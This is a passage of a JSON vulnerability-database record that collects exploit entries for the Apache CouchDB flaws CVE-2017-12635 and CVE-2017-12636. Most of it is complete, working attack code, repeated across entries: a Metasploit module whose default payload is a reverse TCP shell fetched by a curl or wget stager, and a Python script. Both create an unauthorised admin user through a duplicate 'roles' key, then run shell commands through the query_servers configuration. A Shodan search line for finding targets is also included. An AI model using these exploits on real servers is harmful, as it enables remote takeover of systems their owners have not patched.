send_payload(version)\r\n Rex.sleep(5)\r\n # break if we get the shell\r\n break if session_created?\r\n end\r\n end\r\n\r\n # CVE-2017-12635\r\n # The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON,\r\n # the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization\r\n # for the newly created user.\r\n def auth_bypass\r\n username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12)\r\n password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12)\r\n @auth = basic_auth(username, password)\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_users/org.couchdb.user:#{username}\"),\r\n 'method' => 'PUT',\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"type\": \"user\",\"name\": \"#{username}\",\"roles\": [\"_admin\"],\"roles\": [],\"password\": \"#{password}\"})\r\n )\r\n\r\n if res && (res.code == 200 || res.code == 201) && res.get_json_document['ok']\r\n return true\r\n else\r\n return false\r\n end\r\n end\r\n\r\n def get_version\r\n @version = nil\r\n\r\n begin\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'method' => 'GET',\r\n 'authorization' => @auth\r\n )\r\n rescue Rex::ConnectionError\r\n vprint_bad(\"#{peer} - Connection failed\")\r\n return false\r\n end\r\n\r\n unless res\r\n vprint_bad(\"#{peer} - No response, check if it is CouchDB. \")\r\n return false\r\n end\r\n\r\n if res && res.code == 401\r\n print_bad(\"#{peer} - Authentication required.\")\r\n return false\r\n end\r\n\r\n if res && res.code == 200\r\n res_json = res.get_json_document\r\n\r\n if res_json.empty?\r\n vprint_bad(\"#{peer} - Cannot parse the response, seems like it's not CouchDB.\")\r\n return false\r\n end\r\n\r\n @version = res_json['version'] if res_json['version']\r\n return true\r\n end\r\n\r\n vprint_warning(\"#{peer} - Version not found\")\r\n return true\r\n end\r\n\r\n def send_payload(version)\r\n vprint_status(\"#{peer} - CouchDB version is #{version}\") if version\r\n\r\n version = Gem::Version.new(@version)\r\n if version.version.empty?\r\n vprint_warning(\"#{peer} - Cannot retrieve the version of CouchDB.\")\r\n # if target set Automatic, exploit failed.\r\n if target == targets[0]\r\n fail_with(Failure::NoTarget, \"#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.\")\r\n elsif target == targets[1]\r\n payload1\r\n elsif target == targets[2]\r\n payload2\r\n end\r\n elsif version < Gem::Version.new('1.7.0')\r\n payload1\r\n elsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))\r\n payload2\r\n elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')\r\n fail_with(Failure::NotVulnerable, \"#{peer} - The target is not vulnerable.\")\r\n end\r\n end\r\n\r\n # Exploit with multi requests\r\n # payload1 is for the version of couchdb below 1.7.0\r\n def payload1\r\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_hex = Rex::Text.rand_text_hex(32)\r\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\r\n\r\n register_file_for_cleanup(rand_file)\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd1}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %({\"_id\": \"#{rand_hex}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\r\n 'method' => 'POST',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"language\":\"#{rand_cmd1}\",\"map\":\"\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd2}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"/bin/sh #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\r\n 'method' => 'POST',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"language\":\"#{rand_cmd2}\",\"map\":\"\"})\r\n )\r\n end\r\n\r\n # payload2 is for the version of couchdb below 2.1.1\r\n def payload2\r\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_tmp = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_hex = Rex::Text.rand_text_hex(32)\r\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\r\n\r\n register_file_for_cleanup(rand_file)\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_membership\"),\r\n 'method' => 'GET',\r\n 'authorization' => @auth\r\n )\r\n\r\n node = res.get_json_document['all_nodes'][0]\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd1}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %({\"_id\": \"#{rand_hex}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd1}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd2}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"/bin/sh #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd2}\"})\r\n )\r\n end\r\n\r\n def cmdstager_path\r\n @cmdstager_path ||=\r\n \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}\"\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/45019/"}, {"lastseen": "2018-06-20T12:45:35", "bulletinFamily": "exploit", "description": "Apache CouchDB < 2.1.0 - Remote Code Execution. CVE-2017-12636. Webapps exploit for Linux platform", "modified": "2018-06-20T00:00:00", "published": "2018-06-20T00:00:00", "id": "EDB-ID:44913", "href": "https://www.exploit-db.com/exploits/44913/", "type": "exploitdb", "title": "Apache CouchDB < 2.1.0 - Remote Code Execution", "sourceData": "# Title: Apache CouchDB < 2.1.0 - Remote Code Execution\r\n# Author: Cody Zacharias\r\n# Shodan Dork: port:5984\r\n# Vendor Homepage: http://couchdb.apache.org/\r\n# Software Link: http://archive.apache.org/dist/couchdb/source/1.6.0/\r\n# Version: <= 1.7.0 and 2.x - 2.1.0\r\n# Tested on: Debian\r\n# CVE : CVE-2017-12636\r\n# References: \r\n# https://justi.cz/security/2017/11/14/couchdb-rce-npm.html\r\n# https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/\r\n\r\n# Proof of Concept: python exploit.py --priv -c \"id\" http://localhost:5984\r\n\r\n#!/usr/bin/env python\r\nfrom requests.auth import HTTPBasicAuth\r\nimport argparse\r\nimport requests\r\nimport re\r\nimport sys\r\n\r\ndef getVersion():\r\n version = requests.get(args.host).json()[\"version\"]\r\n return version\r\n\r\ndef error(message):\r\n print(message)\r\n sys.exit(1)\r\n\r\ndef exploit(version):\r\n with requests.session() as session:\r\n session.headers = {\"Content-Type\": \"application/json\"}\r\n\r\n # Exploit privilege escalation\r\n if args.priv:\r\n try:\r\n payload = '{\"type\": \"user\", \"name\": \"'\r\n payload += args.user\r\n payload += '\", \"roles\": [\"_admin\"], \"roles\": [],'\r\n payload += '\"password\": \"' + args.password + '\"}'\r\n\r\n pr = session.put(args.host + \"/_users/org.couchdb.user:\" + args.user,\r\n data=payload)\r\n\r\n print(\"[+] User \" + args.user + \" with password \" + args.password + \" successfully created.\")\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to create the user on remote host.\")\r\n\r\n session.auth = HTTPBasicAuth(args.user, args.password)\r\n\r\n # Create payload\r\n try:\r\n if version == 1:\r\n session.put(args.host + \"/_config/query_servers/cmd\",\r\n data='\"' + args.cmd + '\"')\r\n print(\"[+] Created payload at: \" + args.host + \"/_config/query_servers/cmd\")\r\n else:\r\n host = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0]\r\n session.put(args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\",\r\n data='\"' + args.cmd + '\"')\r\n print(\"[+] Created payload at: \" + args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\")\r\n except requests.exceptions.HTTPError as e:\r\n error(\"[-] Unable to create command payload: \" + e)\r\n\r\n try:\r\n session.put(args.host + \"/god\")\r\n session.put(args.host + \"/god/zero\", data='{\"_id\": \"HTP\"}')\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to create database.\")\r\n\r\n # Execute payload\r\n try:\r\n if version == 1:\r\n session.post(args.host + \"/god/_temp_view?limit=10\",\r\n data='{\"language\": \"cmd\", \"map\": \"\"}')\r\n else:\r\n session.post(args.host + \"/god/_design/zero\",\r\n data='{\"_id\": \"_design/zero\", \"views\": {\"god\": {\"map\": \"\"} }, \"language\": \"cmd\"}')\r\n print(\"[+] Command executed: \" + args.cmd)\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to execute payload.\")\r\n\r\n print(\"[*] Cleaning up.\")\r\n\r\n # Cleanup database\r\n try:\r\n session.delete(args.host + \"/god\")\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to remove database.\")\r\n\r\n # Cleanup payload\r\n try:\r\n if version == 1:\r\n session.delete(args.host + \"/_config/query_servers/cmd\")\r\n else:\r\n host = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0]\r\n session.delete(args.host + \"/_node\" + host + \"/_config/query_servers/cmd\")\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to remove payload.\")\r\n\r\ndef main():\r\n version = getVersion()\r\n print(\"[*] Detected CouchDB Version \" + version)\r\n vv = version.replace(\".\", \"\")\r\n v = int(version[0])\r\n if v == 1 and int(vv) <= 170:\r\n exploit(v)\r\n elif v == 2 and int(vv) < 211:\r\n exploit(v)\r\n else:\r\n print(\"[-] Version \" + version + \" not vulnerable.\")\r\n sys.exit(0)\r\n\r\nif __name__ == \"__main__\":\r\n ap = argparse.ArgumentParser(\r\n description=\"Apache CouchDB JSON Remote Code Execution Exploit (CVE-2017-12636)\")\r\n ap.add_argument(\"host\", help=\"URL (Example: http://127.0.0.1:5984).\")\r\n ap.add_argument(\"-c\", \"--cmd\", help=\"Command to run.\")\r\n ap.add_argument(\"--priv\", help=\"Exploit privilege escalation (CVE-2017-12635).\",\r\n action=\"store_true\")\r\n ap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: guest).\",\r\n default=\"guest\")\r\n ap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: guest).\",\r\n default=\"guest\")\r\n args = ap.parse_args()\r\n main()", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44913/"}], "packetstorm": [{"lastseen": "2018-07-13T01:33:32", "bulletinFamily": "exploit", "description": "", "modified": "2018-07-12T00:00:00", "published": "2018-07-12T00:00:00", "id": "PACKETSTORM:148535", "href": "https://packetstormsecurity.com/files/148535/Apache-CouchDB-Arbitrary-Command-Execution.html", "title": "Apache CouchDB Arbitrary Command Execution", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache CouchDB Arbitrary Command Execution', \n'Description' => %q{ \nCouchDB administrative users can configure the database server via HTTP(S). \nSome of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. \nThis allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, \nincluding downloading and executing scripts from the public internet. \n}, \n'Author' => [ \n'Max Justicz', # CVE-2017-12635 Vulnerability discovery \n'Joan Touzet', # CVE-2017-12636 Vulnerability discovery \n'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module \n], \n'References' => [ \n['CVE', '2017-12636'], \n['CVE', '2017-12635'], \n['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'], \n['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'], \n['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E'] \n], \n'DisclosureDate' => 'Apr 6 2016', \n'License' => MSF_LICENSE, \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/shell_reverse_tcp', \n'CMDSTAGER::FLAVOR' => 'curl' \n}, \n'CmdStagerFlavor' => ['curl', 'wget'], \n'Targets' => [ \n['Automatic', {}], \n['Apache CouchDB version 1.x', {}], \n['Apache CouchDB version 2.x', {}] \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options([ \nOpt::RPORT(5984), \nOptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']), \nOptString.new('HttpUsername', [false, 'The username to login as']), \nOptString.new('HttpPassword', [false, 'The password to login with']) \n]) \n \nregister_advanced_options([ \nOptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']), \nOptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp']) \n]) \nend \n \ndef check \nget_version \nversion = Gem::Version.new(@version) \nreturn CheckCode::Unknown if version.version.empty? \nvprint_status \"Found CouchDB version #{version}\" \n \nreturn CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0')) \n \nCheckCode::Safe \nend \n \ndef exploit \nfail_with(Failure::Unknown, \"Something went horribly wrong and we couldn't continue to exploit.\") unless get_version \nversion = @version \n \nvprint_good(\"#{peer} - Authorization bypass successful\") if auth_bypass \n \nprint_status(\"Generating #{datastore['CMDSTAGER::FLAVOR']} command stager\") \n@cmdstager = generate_cmdstager( \ntemp: datastore['WritableDir'], \nfile: File.basename(cmdstager_path) \n).join(';') \n \nregister_file_for_cleanup(cmdstager_path) \n \nif !datastore['Attempts'] || datastore['Attempts'] <= 0 \nattempts = 1 \nelse \nattempts = datastore['Attempts'] \nend \n \nattempts.times do |i| \nprint_status(\"#{peer} - The #{i + 1} time to exploit\") \nsend_payload(version) \nRex.sleep(5) \n# break if we get the shell \nbreak if session_created? \nend \nend \n \n# CVE-2017-12635 \n# The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, \n# the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization \n# for the newly created user. \ndef auth_bypass \nusername = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12) \npassword = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12) \n@auth = basic_auth(username, password) \n \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_users/org.couchdb.user:#{username}\"), \n'method' => 'PUT', \n'ctype' => 'application/json', \n'data' => %({\"type\": \"user\",\"name\": \"#{username}\",\"roles\": [\"_admin\"],\"roles\": [],\"password\": \"#{password}\"}) \n) \n \nif res && (res.code == 200 || res.code == 201) && res.get_json_document['ok'] \nreturn true \nelse \nreturn false \nend \nend \n \ndef get_version \n@version = nil \n \nbegin \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path), \n'method' => 'GET', \n'authorization' => @auth \n) \nrescue Rex::ConnectionError \nvprint_bad(\"#{peer} - Connection failed\") \nreturn false \nend \n \nunless res \nvprint_bad(\"#{peer} - No response, check if it is CouchDB. \") \nreturn false \nend \n \nif res && res.code == 401 \nprint_bad(\"#{peer} - Authentication required.\") \nreturn false \nend \n \nif res && res.code == 200 \nres_json = res.get_json_document \n \nif res_json.empty? \nvprint_bad(\"#{peer} - Cannot parse the response, seems like it's not CouchDB.\") \nreturn false \nend \n \n@version = res_json['version'] if res_json['version'] \nreturn true \nend \n \nvprint_warning(\"#{peer} - Version not found\") \nreturn true \nend \n \ndef send_payload(version) \nvprint_status(\"#{peer} - CouchDB version is #{version}\") if version \n \nversion = Gem::Version.new(@version) \nif version.version.empty? \nvprint_warning(\"#{peer} - Cannot retrieve the version of CouchDB.\") \n# if target set Automatic, exploit failed. \nif target == targets[0] \nfail_with(Failure::NoTarget, \"#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.\") \nelsif target == targets[1] \npayload1 \nelsif target == targets[2] \npayload2 \nend \nelsif version < Gem::Version.new('1.7.0') \npayload1 \nelsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0')) \npayload2 \nelsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0') \nfail_with(Failure::NotVulnerable, \"#{peer} - The target is not vulnerable.\") \nend \nend \n \n# Exploit with multi requests \n# payload1 is for the version of couchdb below 1.7.0 \ndef payload1 \nrand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12) \nrand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12) \nrand_db = Rex::Text.rand_text_alpha_lower(4..12) \nrand_doc = Rex::Text.rand_text_alpha_lower(4..12) \nrand_hex = Rex::Text.rand_text_hex(32) \nrand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\" \n \nregister_file_for_cleanup(rand_file) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd1}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\") \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"), \n'method' => 'PUT', \n'authorization' => @auth \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %({\"_id\": \"#{rand_hex}\"}) \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"), \n'method' => 'POST', \n'authorization' => @auth, \n'ctype' => 'application/json', \n'data' => %({\"language\":\"#{rand_cmd1}\",\"map\":\"\"}) \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd2}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %(\"/bin/sh #{rand_file}\") \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"), \n'method' => 'POST', \n'authorization' => @auth, \n'ctype' => 'application/json', \n'data' => %({\"language\":\"#{rand_cmd2}\",\"map\":\"\"}) \n) \nend \n \n# payload2 is for the version of couchdb below 2.1.1 \ndef payload2 \nrand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12) \nrand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12) \nrand_db = Rex::Text.rand_text_alpha_lower(4..12) \nrand_doc = Rex::Text.rand_text_alpha_lower(4..12) \nrand_tmp = Rex::Text.rand_text_alpha_lower(4..12) \nrand_hex = Rex::Text.rand_text_hex(32) \nrand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\" \n \nregister_file_for_cleanup(rand_file) \n \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_membership\"), \n'method' => 'GET', \n'authorization' => @auth \n) \n \nnode = res.get_json_document['all_nodes'][0] \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd1}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\") \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"), \n'method' => 'PUT', \n'authorization' => @auth \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %({\"_id\": \"#{rand_hex}\"}) \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'ctype' => 'application/json', \n'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd1}\"}) \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd2}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %(\"/bin/sh #{rand_file}\") \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'ctype' => 'application/json', \n'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd2}\"}) \n) \nend \n \ndef cmdstager_path \n@cmdstager_path ||= \n\"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}\" \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148535/apache_couchdb_cmd_exec.rb.txt"}, {"lastseen": "2018-06-23T09:28:55", "bulletinFamily": "exploit", "description": "", "modified": "2018-06-21T00:00:00", "published": "2018-06-21T00:00:00", "id": "PACKETSTORM:148273", "href": "https://packetstormsecurity.com/files/148273/Apache-CouchDB-Remote-Code-Execution.html", "title": "Apache CouchDB Remote Code Execution", "type": "packetstorm", "sourceData": "`# Title: Apache CouchDB < 2.1.0 - Remote Code Execution \n# Author: Cody Zacharias \n# Shodan Dork: port:5984 \n# Vendor Homepage: http://couchdb.apache.org/ \n# Software Link: http://archive.apache.org/dist/couchdb/source/1.6.0/ \n# Version: <= 1.7.0 and 2.x - 2.1.0 \n# Tested on: Debian \n# CVE : CVE-2017-12636 \n# References: \n# https://justi.cz/security/2017/11/14/couchdb-rce-npm.html \n# https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/ \n \n# Proof of Concept: python exploit.py --priv -c \"id\" http://localhost:5984 \n \n#!/usr/bin/env python \nfrom requests.auth import HTTPBasicAuth \nimport argparse \nimport requests \nimport re \nimport sys \n \ndef getVersion(): \nversion = requests.get(args.host).json()[\"version\"] \nreturn version \n \ndef error(message): \nprint(message) \nsys.exit(1) \n \ndef exploit(version): \nwith requests.session() as session: \nsession.headers = {\"Content-Type\": \"application/json\"} \n \n# Exploit privilege escalation \nif args.priv: \ntry: \npayload = '{\"type\": \"user\", \"name\": \"' \npayload += args.user \npayload += '\", \"roles\": [\"_admin\"], \"roles\": [],' \npayload += '\"password\": \"' + args.password + '\"}' \n \npr = session.put(args.host + \"/_users/org.couchdb.user:\" + args.user, \ndata=payload) \n \nprint(\"[+] User \" + args.user + \" with password \" + args.password + \" successfully created.\") \nexcept requests.exceptions.HTTPError: \nerror(\"[-] Unable to create the user on remote host.\") \n \nsession.auth = HTTPBasicAuth(args.user, args.password) \n \n# Create payload \ntry: \nif version == 1: \nsession.put(args.host + \"/_config/query_servers/cmd\", \ndata='\"' + args.cmd + '\"') \nprint(\"[+] Created payload at: \" + args.host + \"/_config/query_servers/cmd\") \nelse: \nhost = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0] \nsession.put(args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\", \ndata='\"' + args.cmd + '\"') \nprint(\"[+] Created payload at: \" + args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\") \nexcept requests.exceptions.HTTPError as e: \nerror(\"[-] Unable to create command payload: \" + e) \n \ntry: \nsession.put(args.host + \"/god\") \nsession.put(args.host + \"/god/zero\", data='{\"_id\": \"HTP\"}') \nexcept requests.exceptions.HTTPError: \nerror(\"[-] Unable to create database.\") \n \n# Execute payload \ntry: \nif version == 1: \nsession.post(args.host + \"/god/_temp_view?limit=10\", \ndata='{\"language\": \"cmd\", \"map\": \"\"}') \nelse: \nsession.post(args.host + \"/god/_design/zero\", \ndata='{\"_id\": \"_design/zero\", \"views\": {\"god\": {\"map\": \"\"} }, \"language\": \"cmd\"}') \nprint(\"[+] Command executed: \" + args.cmd) \nexcept requests.exceptions.HTTPError: \nerror(\"[-] Unable to execute payload.\") \n \nprint(\"[*] Cleaning up.\") \n \n# Cleanup database \ntry: \nsession.delete(args.host + \"/god\") \nexcept requests.exceptions.HTTPError: \nerror(\"[-] Unable to remove database.\") \n \n# Cleanup payload \ntry: \nif version == 1: \nsession.delete(args.host + \"/_config/query_servers/cmd\") \nelse: \nhost = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0] \nsession.delete(args.host + \"/_node\" + host + \"/_config/query_servers/cmd\") \nexcept requests.exceptions.HTTPError: \nerror(\"[-] Unable to remove payload.\") \n \ndef main(): \nversion = getVersion() \nprint(\"[*] Detected CouchDB Version \" + version) \nvv = version.replace(\".\", \"\") \nv = int(version[0]) \nif v == 1 and int(vv) <= 170: \nexploit(v) \nelif v == 2 and int(vv) < 211: \nexploit(v) \nelse: \nprint(\"[-] Version \" + version + \" not vulnerable.\") \nsys.exit(0) \n \nif __name__ == \"__main__\": \nap = argparse.ArgumentParser( \ndescription=\"Apache CouchDB JSON Remote Code Execution Exploit (CVE-2017-12636)\") \nap.add_argument(\"host\", help=\"URL (Example: http://127.0.0.1:5984).\") \nap.add_argument(\"-c\", \"--cmd\", help=\"Command to run.\") \nap.add_argument(\"--priv\", help=\"Exploit privilege escalation (CVE-2017-12635).\", \naction=\"store_true\") \nap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: guest).\", \ndefault=\"guest\") \nap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: guest).\", \ndefault=\"guest\") \nargs = ap.parse_args() \nmain() \n \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148273/apachecouchdb-exec.txt"}]}
